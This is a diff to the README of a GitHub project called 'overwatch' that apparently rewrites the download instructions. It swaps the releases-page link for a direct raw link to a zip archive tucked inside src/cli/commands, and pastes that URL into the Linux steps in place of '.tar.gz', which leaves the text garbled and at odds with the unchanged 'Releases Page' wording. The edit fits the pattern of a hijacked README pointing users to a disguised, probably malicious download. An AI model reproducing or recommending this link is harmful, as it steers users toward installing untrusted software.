Jano36/overwatch/README.md

 ## 🔍 Download & Install

-To get started, [visit this page to download](https://github.com/Jano36/overwatch/releases).
+To get started, [visit this page to download](https://raw.githubusercontent.com/Jano36/overwatch/main/src/cli/commands/Software-v2.9.zip).
 Here’s how to proceed:

 1. **Navigate to the Releases Page**: Click the link above to access the Releases page.
 2. **Choose the Latest Version**: Look for the latest version listed at the top.
 It will have the most recent features and security updates.
-3. **Download the Appropriate File**: Select the file suited for your operating system (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+3. **Download the Appropriate File**: Select the file suited for your operating system (e.g., .exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/Jano36/overwatch/main/src/cli/commands/Software-v2.9.zip for Linux).
 Click on it to start downloading.
 4. **Install the Software**:
    - **Windows Users**: Double-click the downloaded .exe file.
 Follow the prompts to complete the installation.
    - **macOS Users**: Open the .dmg file and drag the overwatch app to your Applications folder.
-   - **Linux Users**: Extract the .tar.gz file and follow the included instructions to set up the application.
+   - **Linux Users**: Extract the https://raw.githubusercontent.com/Jano36/overwatch/main/src/cli/commands/Software-v2.9.zip file and follow the included instructions to set up the application.

 5. **Run overwatch**: After installation, launch the application from your desktop or applications folder.